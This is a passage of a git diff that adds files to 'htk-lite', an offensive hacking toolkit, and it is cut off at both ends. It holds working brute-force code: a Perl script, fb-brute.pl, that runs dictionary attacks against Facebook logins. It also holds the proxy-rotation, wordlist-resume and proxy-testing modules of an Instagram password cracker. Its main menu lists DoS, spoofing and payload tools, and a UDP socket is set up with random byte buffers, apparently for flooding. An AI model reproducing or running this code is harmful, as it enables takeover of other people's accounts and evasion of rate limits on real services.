info(self, msg): + self.clear() + + if self.__is_color: + print('{0}[{1}i{0}] {2}{3}{4}'.format( + Fore.YELLOW, Fore.CYAN, Fore.WHITE, msg, Fore.RESET + )) + else: + print('[i] {}'.format(msg)) + + sleep(2.5) + + def warning(self, msg): + self.clear() + + if self.__is_color: + print('{0}[{1}!{0}] {1}{2}{3}'.format( + Fore.YELLOW, Fore.RED, msg, Fore.RESET + )) + else: + print('[!] {}'.format(msg)) + + sleep(self.delay) + + def prompt(self, data): + self.clear() + + if self.__is_color: + return input('{0}[{1}?{0}] {2}{3}{4}'.format( + Fore.YELLOW, Fore.CYAN, Fore.WHITE, data, Fore.RESET + )) + else: + return input('[?] {}'.format(data)) diff --git a/htk-lite/files/Instagram/lib/password_manager.py b/htk-lite/files/Instagram/lib/password_manager.py new file mode 100644 index 0000000..d10c83e --- /dev/null +++ b/htk-lite/files/Instagram/lib/password_manager.py @@ -0,0 +1,108 @@ +# Date: 12/28/2018 +# Author: Mohamed +# Description: Password manager + +from time import sleep +from hashlib import sha256 +from sys import version_info +from lib.display import Display +from lib.session import Session + + +class PasswordManager(object): + + def __init__(self, username, passlist_path, max_passwords, display): + self.passlist = [] + self.session = None + self.resume = False + self.is_alive = True + self.is_read = False + self.display = display + self.fingerprint = None + self.username = username + self.passwords_removed = 0 + self.passlist_path = passlist_path + self.max_passwords = max_passwords + Display.total_lines = self.count_lines() + + @property + def list_size(self): + return len(self.passlist) + + def list_add(self, password): + if not password in self.passlist: + self.passlist.append(password) + + def list_remove(self, password): + if password in self.passlist: + self.attempts += 1 + self.passlist.pop(self.passlist.index(password)) + self.session.write(self.attempts, self.passlist) + + def count_lines(self): + lines = 0 + + fingerprint = sha256( + self.username.lower().strip().encode() + ).hexdigest().encode() + + self.display.info('Reading wordlist ...') + + with open(self.passlist_path, 'rb') as f: + + for data in f: + lines += 1 + chunk = sha256(data).hexdigest().encode() + fingerprint = sha256(fingerprint + chunk).hexdigest().encode() + + self.fingerprint = fingerprint + self.session = Session(self.fingerprint) + + return lines + 1 + + def read(self): + attempts = 0 + with open(self.passlist_path, 'rt', encoding='utf-8') as passlist: + + for password in passlist: + if not self.is_alive: + break + + if self.resume: + self.attempts, self.passlist = self.session.read() + + if attempts < (self.attempts + self.list_size): + attempts += 1 + continue + else: + self.resume = False + + password = password.replace('\n', '').replace( + '\r', '').replace('\t', '') + + if self.list_size < self.max_passwords: + self.list_add(password) + else: + while self.list_size >= self.max_passwords and self.is_alive: + sleep(0.5) + + if self.is_alive: + self.list_add(password) + self.session.write(self.attempts, self.passlist) + + if self.is_alive: + self.is_read = True + + @property + def attempts(self): + return self.passwords_removed + + @attempts.setter + def attempts(self, n): + self.passwords_removed = n + + def start(self): + self.read() + + def stop(self): + self.is_alive = False diff --git a/htk-lite/files/Instagram/lib/proxy.py b/htk-lite/files/Instagram/lib/proxy.py new file mode 100644 index 0000000..02281d5 --- /dev/null +++ b/htk-lite/files/Instagram/lib/proxy.py @@ -0,0 +1,26 @@ +# Date: 12/28/2018 +# Author: Mohamed +# Description: Proxy + + +class Proxy(object): + + def __init__(self, proxy): + self.proxy = proxy + + @property + def ip(self): + return self.proxy['ip'] + + @property + def port(self): + return self.proxy['port'] + + @property + def country(self): + return self.proxy['country'] + + @property + def addr(self): + addr = '{}:{}'.format(self.proxy['ip'], self.proxy['port']) + return {'http': addr, 'https': addr} diff --git a/htk-lite/files/Instagram/lib/proxy_list.py b/htk-lite/files/Instagram/lib/proxy_list.py new file mode 100644 index 0000000..3cbe104 --- /dev/null +++ b/htk-lite/files/Instagram/lib/proxy_list.py @@ -0,0 +1,18 @@ +# Date: 12/28/2018 +# Author: Mohamed +# Description: A list that will manage proxies + + +class ProxyList(object): + + def __init__(self): + self.list = [] + + def __contains__(self, proxy): + for _proxy in self.list: + if _proxy.ip == proxy['ip'] and _proxy.port == proxy['port']: + return True + return False + + def append(self, proxy): + self.list.append(proxy) \ No newline at end of file diff --git a/htk-lite/files/Instagram/lib/proxy_manager.py b/htk-lite/files/Instagram/lib/proxy_manager.py new file mode 100644 index 0000000..6bf3ee4 --- /dev/null +++ b/htk-lite/files/Instagram/lib/proxy_manager.py @@ -0,0 +1,42 @@ +# Date: 12/28/2018 +# Author: Mohamed +# Description: Proxy manager + +from time import sleep +from queue import Queue +from .scraper import Scraper +from .bad_proxies import BadProxies + + +class ProxyManager(object): + + def __init__(self): + self.is_alive = True + self.proxies = Queue() + self.scraper = Scraper() + self.bad_proxies = BadProxies() + + def collect(self): + while self.is_alive: + if not self.proxies.qsize(): + + for proxy in self.scraper.proxies: + if not proxy in self.bad_proxies: + self.proxies.put(proxy) + + sleep(5) + + def bad_proxy(self, proxy): + if not proxy in self.bad_proxies: + self.bad_proxies.append(proxy) + + def get_proxy(self): + if self.proxies.qsize(): + return self.proxies.get() + + def start(self): + self.collect() + + def stop(self): + self.is_alive = False + self.scraper.is_alive = False \ No newline at end of file diff --git a/htk-lite/files/Instagram/lib/scraper.py b/htk-lite/files/Instagram/lib/scraper.py new file mode 100644 index 0000000..529d249 --- /dev/null +++ b/htk-lite/files/Instagram/lib/scraper.py @@ -0,0 +1,123 @@ +# Date: 12/28/2018 +# Author: Mohamed +# Description: Proxy scraper + +from time import sleep +from requests import get +from .proxy import Proxy +from random import randint +from .display import Display +from .proxy_list import ProxyList +from bs4 import BeautifulSoup as bs +from threading import Thread, RLock +from .const import fetch_time, debug + + +class Scraper(object): + + def __init__(self): + self.lock = RLock() + self.is_alive = True + self.display = Display() + self.scraped_proxies = [] + self.extra_proxies_link = 'http://spys.me/proxy.txt' + + self.links = [ + 'https://sslproxies.org', + 'https://free-proxy-list.net', + 'https://free-proxy-list.net/anonymous-proxy.html' + ] + + def parse_extra_proxy(self, proxy): + proxy = proxy.split(' ') + addr = proxy[0].split(':') + + return { + 'ip': addr[0], + 'port': addr[1], + 'country': proxy[1].split('-')[0] + } + + def parse_proxy(self, proxy): + proxy = proxy.find_all('td') + if proxy[4].string != 'transparent' and proxy[5].string != 'transparent': + return { + 'ip': proxy[0].string, + 'port': proxy[1].string, + 'country': proxy[3].string + } + + def scrape_proxies(self, link): + proxies = [] + + try: + proxies = bs(get(link, timeout=fetch_time).text, + 'html.parser').find('tbody').find_all('tr') + except: + pass + + if not proxies: + with self.lock: + if self.is_alive and debug: + self.display.warning( + 'Failed to grab proxies from {}'.format(link)) + + for proxy in proxies: + with self.lock: + _proxy = self.parse_proxy(proxy) + if _proxy: + self.scraped_proxies.append(_proxy) + + def scrape_extra_proxies(self): + proxies = [] + + try: + if self.is_alive: + proxies = get(self.extra_proxies_link, + timeout=fetch_time).text.split('\n') + except: + pass + + if not proxies: + with self.lock: + if self.is_alive and debug: + self.display.warning( + 'Failed to grab proxies from {}'.format(self.extra_proxies_link)) + + for proxy in proxies: + if '-H' in proxy and '-S' in proxy: + with self.lock: + self.scraped_proxies.append(self.parse_extra_proxy(proxy)) + + @property + def proxies(self): + proxy_list = ProxyList() + + threads = [] + threads = [Thread(target=self.scrape_proxies, args=[link]) + for link in self.links] + threads.append(Thread(target=self.scrape_extra_proxies)) + + index = 0 + while index < len(threads) and self.is_alive: + thread = threads[index] + + try: + thread.daemon = True + thread.start() + index += 1 + except: + sleep(0.5) + + while self.is_alive and len(threads): + for thread in [thread for thread in threads if not thread.is_alive()]: + threads.pop(threads.index(thread)) + sleep(0.5) + + if self.is_alive: + for proxy in self.scraped_proxies: + + if not proxy in proxy_list: + proxy_list.append(Proxy(proxy)) + + return [proxy_list.list.pop(randint(0, len(proxy_list.list)-1)) for _ in range(len(proxy_list.list))] diff --git a/htk-lite/files/Instagram/lib/session.py b/htk-lite/files/Instagram/lib/session.py new file mode 100644 index 0000000..91fd976 --- /dev/null +++ b/htk-lite/files/Instagram/lib/session.py @@ -0,0 +1,106 @@ +# Date: 05/05/2018 +# Author: Mohamed +# Description: Session Handler + +import json +import sqlite3 +from os import remove +from sys import version_info +from lib.const import db_path +from os.path import exists as path +from csv import DictWriter, DictReader + + +class DatabaseWrapper: + + def __init__(self, db_name): + self.db_name = db_name + + def db_query(self, cmd, args=[], fetchone=True): + database = sqlite3.connect(self.db_name) + sql = database.cursor().execute(cmd, args) + data = sql.fetchone()[0] if fetchone else sql.fetchall() + database.close() + return data + + def db_execute(self, cmd, args=[]): + database = sqlite3.connect(self.db_name) + database.cursor().execute(cmd, args) + database.commit() + database.close() + + +class Session(DatabaseWrapper): + + is_busy = False + + def __init__(self, fingerprint): + super().__init__(db_path) + self.fingerprint = fingerprint + self.create_tables() + + def create_tables(self): + self.db_execute(''' + CREATE TABLE IF NOT EXISTS + Session( + session_id TEXT, + attempts INTEGER, + list TEXT, + + PRIMARY KEY(session_id) + ); + ''') + + @property + def exists(self): + return self.db_query('SELECT COUNT(*) FROM Session WHERE session_id=?;', [self.fingerprint]) + + def read(self): + + if not self.exists: + return 0, [] + + attempts, list = self.db_query(''' + SELECT attempts, list + FROM Session + WHERE session_id=? + ''', args=[self.fingerprint], fetchone=False)[0] + + return attempts, json.loads(list) + + def _write(self, attempts, _list): + + if not self.exists: + self.db_execute(''' + INSERT INTO Session(session_id, attempts, list) + VALUES(?, ?, ?); + ''', args=[self.fingerprint, attempts, json.dumps(_list)]) + return + + self.db_execute(''' + UPDATE Session + SET attempts=?, list=? + WHERE session_id=?; + ''', args=[attempts, json.dumps(_list), self.fingerprint]) + + def write(self, attempts, _list): + if not attempts: + return + + while Session.is_busy: + pass + + try: + Session.is_busy = True + self._write(attempts, _list) + except: + pass + finally: + Session.is_busy = False + + def delete(self): + if self.exists: + self.db_execute(''' + DELETE FROM Session + WHERE session_id=?; + ''', args=[self.fingerprint]) diff --git a/htk-lite/files/Instagram/requirements.txt b/htk-lite/files/Instagram/requirements.txt new file mode 100644 index 0000000..d86bc64 --- /dev/null +++ b/htk-lite/files/Instagram/requirements.txt @@ -0,0 +1,4 @@ +bs4 +future +requests +colorama diff --git a/htk-lite/files/Instagram/test_proxies.py b/htk-lite/files/Instagram/test_proxies.py new file mode 100644 index 0000000..bc95120 --- /dev/null +++ b/htk-lite/files/Instagram/test_proxies.py @@ -0,0 +1,138 @@ +''' +Date: 3/15/2019 +Author: Mohamed +Description: Reads a file that contains a list of proxies and determines whether or not that list is good. + Each line in the file must be in the format of ip:port +''' + +import platform +from os import system +from time import sleep +from requests import Session +from threading import Thread, RLock + +proxy_list = 'proxies.txt' +target_site = 'https://instagram.com' + + +def get_proxies(): + proxies = [] + + with open(proxy_list, 'rt', encoding='utf-8') as proxies_file: + + for line in proxies_file: + if not line: + continue + + ip, port = line.replace('\r', '').split(':') + + port = int(port) + proxy = {'ip': ip, 'port': port} + proxies.append(proxy) + + return proxies + + +class TestProxies: + + def __init__(self, proxies): + self.worked = 0 + self.failed = 0 + self.lock = RLock() + self.active_brs = 0 + self.is_alive = True + self.proxies = proxies + self.total = len(proxies) + self.test_link = target_site + + def display(self): + system('cls' if platform.system() == 'Windows' else 'clear') + worked, failed, total = self.worked, self.failed, self.total + + worked_per = round((worked/total) * 100, 2) + failed_per = round((failed/total) * 100, 2) + complete = round(worked_per + failed_per, 2) + + print(f'Complete: {complete}%') + print(f'Active browsers: {self.active_brs}') + print(f'Proxies worked: {worked_per}% [{worked}]') + print(f'Proxies failed: {failed_per}% [{failed}]') + + def test_proxy(self, proxy): + br = Session() + + addr = '{}:{}'.format(proxy['ip'], proxy['port']) + addr = {'http': addr, 'https': addr} + br.proxies.update(addr) + + try: + br.get(self.test_link, timeout=(10, 15)) + + with self.lock: + self.worked += 1 + except: + with self.lock: + self.failed += 1 + finally: + br.close() + + if self.is_alive: + with self.lock: + self.display() + + self.active_brs -= 1 + + def start(self): + for proxy in self.proxies: + + while self.is_alive and self.active_brs >= 512: + pass + + if not self.is_alive: + break + + with self.lock: + self.active_brs += 1 + + Thread(target=self.test_proxy, args=[proxy], daemon=True).start() + + while self.is_alive and self.active_brs: + sleep(0.5) + + self.display() + + def stop(self): + self.is_alive = False + + while self.active_brs: + try: + with self.lock: + self.display() + + sleep(0.5) + except KeyboardInterrupt: + break + + def examine(self): + failed = self.failed / self.total + worked = self.worked / self.total + + if worked == 0: + print('Bad proxy list') + elif (failed - worked) >= 0.1: + print('Bad proxy list') + elif (failed - worked) == 0: + print('Bad proxy list') + else: + print('Good proxy list') + + +if __name__ == '__main__': + test_proxies = TestProxies(get_proxies()) + + try: + test_proxies.start() + except KeyboardInterrupt: + test_proxies.stop() + finally: + test_proxies.examine() diff --git a/htk-lite/files/fb-brute.pl b/htk-lite/files/fb-brute.pl new file mode 100644 index 0000000..4568e6d --- /dev/null +++ b/htk-lite/files/fb-brute.pl @@ -0,0 +1,124 @@ +#!/usr/bin/perl +# +# Bruteforce-Facebook +# +# Description: +# Imad'Ox Cracker is a password cracking tool written in perl to perform a dictionary-based attack on a specific Facebook user through HTTPS. +# +# Usage: +# perl Imad'Ox-Bruter.pl login wordlist +# login could be either a user's email address or profile name +# +# Module Requirements: +# +# Install module if missing: +# perl -MCPAN -e 'install Net::SSLeay' +# +# Demo: +# perl Imad'Ox-Bruter.pl Facebooklogin@facebook.com wordlist.lst +# +# --- Imad'Ox-Bruter Facebook password cracking tool +# --- By Imad'Ox Hunter +# --- www.facebook.com/imad.elouajib +# +# [+] Cracking Facebooklogin@facebook.com ... +# +# [-] test -> Failed +# [-] test123 -> Failed +# [-] testtest -> Failed +# [-] testest123 -> Failed +# [-] qwerty -> Failed +# [-] azerty -> Failed +# [-] password -> Failed +# [-] password123 -> Failed +# +######################################################## +# [+] CRACKED! Your password is P@$$W0RD +######################################################## +# + +use strict; +use Net::SSLeay::Handle; + +if(!defined($ARGV[0] && $ARGV[1])) { + +system('clear'); +print "\n+++ Imad'Ox-Bruter Facebook password Bruter\n"; +print "+++ Coded by Imad'Ox-Hunter\n"; +print "+++ www.fb.com/imad.elouajib\n\n"; +print "+++ Usage: perl $0 login wordlist\n\n"; +exit; } + +my $user = $ARGV[0]; +my $wordlist = $ARGV[1]; + +open (LIST, $wordlist) || die "\n[-] No Wordlist On $wordlist -_- \n"; + +print "\n+++ Imad'Ox-Bruter Facebook password Bruter\n"; +print "+++ Coded by Imad'Ox-Hunter\n"; +print "+++ www.fb.com/imad.elouajib\n"; +print "\n[+] Now Cracking $user ...\n\n"; + +while (my $password = ) { +chomp ($password); +$password =~ s/([^^A-Za-z0-9\-_.!~*'()])/ sprintf "%%%0x", ord $1 /eg; + +my $a = "POST /login.php HTTP/1.1"; +my $b = "Host: www.facebook.com"; +my $c = "Connection: close"; +my $e = "Cache-Control: max-age=0"; +my $f = "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"; +my $g = "Origin: https://www.facebook.com"; +my $h = "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31"; +my $i = "Content-Type: application/x-www-form-urlencoded"; +my $j = "Accept-Encoding: gzip,deflate,sdch"; +my $k = "Accept-Language: en-US,en;q=0.8"; +my $l = "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3"; + +my $cookie = "cookie: datr=80ZzUfKqDOjwL8pauwqMjHTa"; +my $post = "lsd=AVpD2t1f&display=&enable_profile_selector=&legacy_return=1&next=&profile_selector_ids=&trynum=1&timezone=300&lgnrnd=031110_Euoh&lgnjs=1366193470&email=$user&pass=$password&default_persistent=0&login=Log+In"; +my $cl = length($post); +my $d = "Content-Length: $cl"; + + +my ($host, $port) = ("www.facebook.com", 443); + +tie(*SSL, "Net::SSLeay::Handle", $host, $port); + + +print SSL "$a\n"; +print SSL "$b\n"; +print SSL "$c\n"; +print SSL "$d\n"; +print SSL "$e\n"; +print SSL "$f\n"; +print SSL "$g\n"; +print SSL "$h\n"; +print SSL "$i\n"; +print SSL "$j\n"; +print SSL "$k\n"; +print SSL "$l\n"; +print SSL "$cookie\n\n"; + +print SSL "$post\n"; + +my $success; +while(my $result = ){ +if($result =~ /Location(.*?)/){ +$success = $1; +} +} +if (!defined $success) +{ +print "[-] Trying -> $password \n"; +close SSL; +} +else +{ +print "\n########################################################\n"; +print "[+] Password Cracked => $password \n"; +print "########################################################\n\n"; +close SSL; +exit; +} +} diff --git a/htk-lite/htkl.py b/htk-lite/htkl.py new file mode 100644 index 0000000..c5a2f34 --- /dev/null +++ b/htk-lite/htkl.py @@ -0,0 +1,1899 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @tuf_unkn0wn +#i do not give you permission to show / edit this script without my credit +#to ask questions or report a problem message me on instagram @tuf_unkn0wn +""" + + + ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ +▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ +▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ +░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ +░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ + ▒ ▒░▒ ▒▒ ▓▒█ ░▒ ▒ ░▒ ▒▒ ▓▒ ▒░ ░ ▒▒▓ ▒ + ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ + ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ + + +""" +import smtplib +import random +import requests +import os +import sys +import socks +import socket +import readline +import time +from datetime import datetime +now = datetime.now() +hour = now.hour +minute = now.minute +day = now.day +month = now.month +year = now.year +os.system("clear") +sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) +Gb = random._urandom(20000) +bytes = random._urandom(20000) +Kb = random._urandom(20000) + +os.system("printf '\e[8;27;100t'") +os.system("printf '\033]2;Hackers-Tool-Kit-Lite | HTK-Lite | @tuf_unkn0wn\a'") + +r = '\033[31m' +W = '\033[90m' +R = '\033[91m' +N = '\033[0m' +G = '\033[92m' +B = '\033[94m' +Y = '\033[93m' +LB = '\033[1;36m' +P = '\033[95m' +Bl = '\033[30m' +O = '\033[33m' +p = '\033[35m' +BD = '\033[1m' + +lred = '\033[91m' +lblue = '\033[94m' +lgreen = '\033[92m' +yellow = '\033[93m' +cyan = '\033[1;36m' +purple = '\033[95m' +red = '\033[31m' +green = '\033[32m' +blue = '\033[34m' +orange = '\033[33m' + +colorlist = [red, blue, green, yellow, lblue, purple, cyan, lred, lgreen, orange] +randomcolor = random.choice(colorlist) +banner3list = [red, blue, green, purple] +inputlist = ['☢', '☣', '☠', '♠', '❖', '⚛', '☘', '♞', '⚄', '⚒', '⚓', '⚔', '⬖', '⬗', '⬘', '⬙'] + + +def starting(): + os.system("service tor start") + os.system("service postgresql start") + + os.system("clear") + + for x in range(5): + + print(random.choice(colorlist) + "##########") + + time.sleep(0.1) + + os.system("clear") + + print(random.choice(colorlist) + "++########") + + time.sleep(0.1) + + os.system("clear") + + print(random.choice(colorlist) + "++++######") + + time.sleep(0.1) + + os.system("clear") + + print(random.choice(colorlist) + "++++++####") + + time.sleep(0.1) + + os.system("clear") + + print(random.choice(colorlist) + "++++++++##") + + time.sleep(0.1) + + os.system("clear") + + + + + +def mainbanner1(): + print """\033[1;36m + ┬ ┬┌┬┐┌─┐\033[0m + │ │ │ ├┤ \033[1;36m + ┴─┘┴ ┴ └─┘ \033[0m +██╗ ██╗████████╗██╗ ██╗ +██║ ██║╚══██╔══╝██║ ██╔╝\033[1;36m +███████║ ██║ █████╔╝ \033[0m +██╔══██║ ██║ ██╔═██╗ +██║ ██║ ██║ ██║ ██╗ +╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ + \n""".decode('utf-8') + +def mainbanner2(): + print """ + ░░▒█████████ + ▒▓▓█████████████ + ░▓█████████████████████░ ░▒███▓ + ░▓██████████████████████████████████ + ░░▒▓▓▓███████████┬ ┬┌┬┐┌─┐████████████▓ + ░▓██████▓▓██████████│ │ │ ├┤ █████████████▓░ + ░▓██████▓███████▓██████┴─┘┴ ┴ └─┘████████████████░ + ░░▒░░░░▒▒▒▓▓░░▒███████████████████████████▓▓▓░ + ░░░▒░░░▒▓▓▒░▒▒░▒▓████████▓▓██▒▒░ + ░▒░░░░░░▒░░░░░░░ + \n""".decode('utf-8') + +def mainbanner3(): + print """ +╔═══════════════════════════════════════════════╗ +║ ║ +║ {0} ██░ ██ ▄▄▄█████▓ ██ ▄█▀ ██▓ \033[0m ║ +║ {1} ▓██░ ██▒▓ ██▒ ▓▒ ██▄█▒ ▓██▒ \033[0m ║ +║ {2} ▒██▀▀██░▒ ▓██░ ▒░▓███▄░ ▒██░ \033[0m ║ +║ {3} ░▓█ ░██ ░ ▓██▓ ░ ▓██ █▄ ▒██░ \033[0m║ +║ {4} ░▓█▒░██▓ ▒██▒ ░ ▒██▒ █▄░██████▒ \033[0m║ +║ {5} ▒ ░░▒░▒ ▒ ░░ ▒ ▒▒ ▓▒░ ▒░▓ ░ \033[0m║ +║ {6} ▒ ░▒░ ░ ░ ░ ░▒ ▒░░ ░ ▒ ░ \033[0m║ +║ {7} ░ ░░ ░ ░ ░ ░░ ░ ░ ░ \033[0m║ +║ {8} ░ ░ ░ ░ ░ ░ ░ \033[0m║ +║ ║ +║ ║ +╚═══════════════════════════════════════════════╝ + """.decode('utf-8').format(random.choice(banner3list), random.choice(banner3list), random.choice(banner3list), random.choice(banner3list), random.choice(banner3list), random.choice(banner3list), random.choice(banner3list), random.choice(banner3list), random.choice(banner3list)) + +def mainbanner4(): + print """\033[0m +████████████████████████████████████████████████████████████████████████████\033[91m +███ ███████ ██ █ ███ ███████ ████████ ██ ████████████\033[33m +████ ███████ ██████ █████ ██ █████████ █ █ █████████ ██ ██ ██████ ███\033[93m +████ █████ ███████ ██████ █████████████ ████████ ███ █████ ████\033[92m +████ ██████ █████ █████████████ ██████ █ █ ██ ██ █ █████ ███\033[94m +████ █████ ███████ ██████ █████████████ █████████ ████ ███ ███\033[1;36m +████ ███████ ███████ ██████ ██ ███████████ █████ ███ ████ ██ █ █████████\033[95m +███ █████ █████ ████ ███ ████████ ██ ███ ████ ███\033[0m +████████████████████████████████████████████████████████████████████████████ + \033[0m\n""".decode('utf-8') + +def mainbanner5(): + print """\033[92m + + █ ▄ ▄ █ ▄███▄ ▄██ ▄███▀ + ███ ███ ▄█████████▄ ███▐██▀ + ███ ███ ██▀▀███▀▀██ █████▀ + ███▄▄▄▄███ ▀ ███ ▀ ██████▄ + ███▀▀▀▀███ ▄ ███ ▄ ███▐██▄ + ███ ███ \033[0m┌─┐┌─┐┬┌─┌─┐┬─┐┌─┐ \033[92m███ \033[0m┌─┐┌─┐┬ \033[92m███ ▀███▄ \033[0m┬┌┬┐\033[92m + ███ ███ \033[0m├─┤│ ├┴┐├┤ ├┬┘└─┐ \033[92m███ \033[0m│ ││ ││ \033[92m███ ██ \033[0m│ │ \033[92m + █ █ \033[0m┴ ┴└─┘┴ ┴└─┘┴└─└─┘ \033[92m▀███▀ \033[0m└─┘└─┘┴─┘ \033[92m▀ ▀ \033[0m┴ ┴\033[92m + + + + ███ + █ █ + █ █ ██ ████████ ███████ + █ █ ██ ██ ██ + █ █ ██ ██ █████ + █ █ ▄ ██ ██ ██ + █████▄▄██ ██ ██ ███████ + + + """.decode('utf-8') + +def mainbanner6(): + print """ + • \033[35m▄█\033[0m . \033[35m█▄ \033[0m. \033[35m███ \033[0m. • \033[35m▄█ ▄█▄\033[0m. \033[35m▄█ \033[0m• + \033[35m█#█ █#█\033[0m• \033[35m▀████=████▄\033[0m. \033[35m███ ▄█ █▀ █⇣█ \033[0m. +. \033[35m█#█ \033[0m. •\033[35m█#█ \033[0m. \033[35m▀█-█▀▀██ \033[0m.\033[35m█ █▐ █▀ \033[0m• \033[35m█L█ \033[0m. + \033[35m▄███▄▄▄▄███▄▄ \033[0m. \033[35m█▪█ \033[0m. \033[35m▀ ▄█████▀ \033[0m.\033[35m█i█ +▀▀█+█▀▀▀▀█+█▀ \033[0m• \033[35m█▪█ \033[0m. \033[35m▀▀█ █ █▄\033[0m. \033[35m█t█ \033[0m. + .\033[35m█•█ \033[0m. \033[35m█•█ \033[0m. \033[35m█▪█ \033[0m• \033[35m███▐ █▄ \033[0m. \033[35m█e█ \033[0m. + \033[35m█+█ █+█ \033[0m. \033[35m█▪█ \033[0m. \033[35m█ █\033[0m.\033[35m▀█ █▄ █⇡█▌ \033[0m• \033[35m▄ +\033[0m• \033[35m███ \033[0m.\033[35m█▀ \033[0m. \033[35m ▄████▀ \033[0m. \033[35m███ \033[0m. \033[35m▀█▀ █████▄▄██ + \033[0m . . . . \033[35m▀ \033[0m•\033[35m▀\033[0m] + """.decode('utf-8') +def mainbanner7(): + print """\033[31m +██╗ ██╗████████╗██╗ ██╗ ██╗ ██╗████████╗███████╗ +██║ ██║╚\033[91m══██╔══╝██║ ██╔╝ ██║ ██║╚══██╔══╝██╔════╝ +███████║ ██║ █████╔╝████\033[33m█╗██║ ██║ ██║ █████╗ +██╔══██║ ██║ ██╔═██╗╚════╝\033[93m██║ ██║ ██║ ██╔══╝ +██║ ██║ ██║ ██║ ██╗ ███████╗██║ ██║ ███████╗ +╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚══════╝╚═╝ ╚═╝ ╚══════╝\033[0m + """.decode('utf-8') + +def mainbanner8(): + print """\033[34m +██╗ ██╗████████╗██╗ ██╗ ██╗ ██╗████████╗███████╗ +██║ ██║╚══██╔══╝██║ ██╔╝ ██║ ██║╚══██╔══╝██╔════╝ +███████║ ██║ █████╔╝█████╗█\033[94m█║ ██║ ██║ █████╗ +██╔══██║ ██║ ██╔═██╗╚════╝██║ ██║ ██║ ██╔══╝ +██║ ██║ █\033[1;36m█║ ██║ ██╗ ███████╗██║ ██║ ███████╗ +╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚══════╝╚═╝ ╚═╝ ╚══════╝ + \033[0m""".decode('utf-8') + +def mainbanner9(): + print """\033[93m +██╗ ██╗████████╗██╗ ██╗ ██╗ ██╗████████╗███████╗ +██║ ██║╚══██╔══╝██║ ██╔╝ ██║ ██║╚══██╔══╝██╔════╝ +███\033[92m████║ ██║ █████╔╝█████╗██║ ██║ ██║ █████╗ +██╔══██║ ██║ ██╔═██╗╚════╝\033[32m██║ ██║ ██║ ██╔══╝ +██║ ██║ ██║ ██║ ██╗ ███████╗██║ ██║ ███████╗ +╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚══════╝╚═╝ ╚═╝ ╚══════╝ + \033[0m""".decode('utf-8') + +def mainbanner(): + import random + for x in range(10): + num = random.randint(1,9) + if num == 1: + mainbanner1() + if num == 2: + mainbanner2() + if num == 3: + mainbanner3() + if num == 4: + mainbanner4() + if num == 5: + mainbanner5() + if num == 6: + mainbanner6() + if num == 7: + mainbanner7() + if num == 8: + mainbanner8() + if num == 9: + mainbanner9() + +def helpbanner(): + a = os.popen("ls commandlist -1 | wc -l").read() + b = a.replace('\n', '') + print """ +╔══════════════════════════════════════════════════════════╗ +║ ║ +║ \033[92m ██░ ██ ▓█████ ██▓ ██▓███ \033[0m ║ +║ \033[90m ▓██░ ██▒▓█ ▀ ▓██▒ ▓██░ ██▒ \033[0m ║ +║ \033[92m ▒██▀▀██░▒███ ▒██░ ▓██░ ██▓▒ \033[0m ║ +║ \033[90m ░▓█ ░██ ▒▓█ ▄ ▒██░ ▒██▄█▓▒ ▒ \033[0m ║ +║ \033[92m ░▓█▒░██▓░▒████▒░██████▒▒██▒ ░ ░ \033[0m ║ +║ \033[94m ▒ ░░▒░▒░░ ▒░ ░░ ▒░▓ ░▒▓▒░ ░ ░ \033[0m ║ +║ \033[90m ▒ ░▒░ ░ ░ ░ ░░ ░ ▒ ░░▒ ░ \033[0m ║ +║ \033[94m ░ ░░ ░ ░ ░ ░ ░░ \033[0m ║ +║ \033[90m ░ ░ ░ ░ ░ ░ ░ \033[0m ║ +║ ║ +║══════════════════════════════════════════════════════════║ +║ Commands: [\033[32m{0}\033[0m] Banners: [\033[31m9\033[0m] ║ +║══════════════════════════════════════════════════════════════════════════════════════╗ +║ ? | this menu ║ +║ exit | exit htkl ║ +║ reboot | reboot htkl ║ +║ clear | clears screen ║ +║ banner | shows a banner ║ +║ command | run a terminal command ║ +║ terminal | open another terminal ║ +║ sysinfo | gather information about your device ║ +║ infoscan | gather information on a host [for a more specific scan type infoscan -o] ║ +║ dos | run Denial-Of-Service attacks ║ +║ payload | Make a msf payload ║ +║ password | crack social media, service and wifi passwords ║ +║ monitor | turn monitor mode on and off [monitor on | monitor off] ║ +║ anon | make yourself anonymous [anon on | anon off] ║ +║ netscan | gather information about your network ║ +║ verscan | scan for a service version on a host ║ +║ wordlist | make wordlists ║ +║ arpspoof | ARP Spoofing ║ +║ traff | show internet traffic ║ +║ hashid | find out what type of hash a hash is ║ +║ aserver | start a apache server ║ +║ dnsspoof | DNS Spoofing [to dns spoof subnet type dnsspoof --all] ║ +║ ║ +║ ║ +║ ║ +║ \033[5m@tuf_unkn0wn\033[0m ║ +╚══════════════════════════════════════════════════════════════════════════════════════╝ + \033[0m\n""".format(b) + +def infoscan(): + try: + target = raw_input("\033[1mTarget:\033[0m ") + port = raw_input("\033[1mPort:\033[0m ") + print "\033[93m! HTTP OR HTTPS !\033[0m\n" + ht = raw_input("[https/http]: ") + if ht == "http": + targetht = 'http://' + if ht == "https": + targetht = 'https://' + print 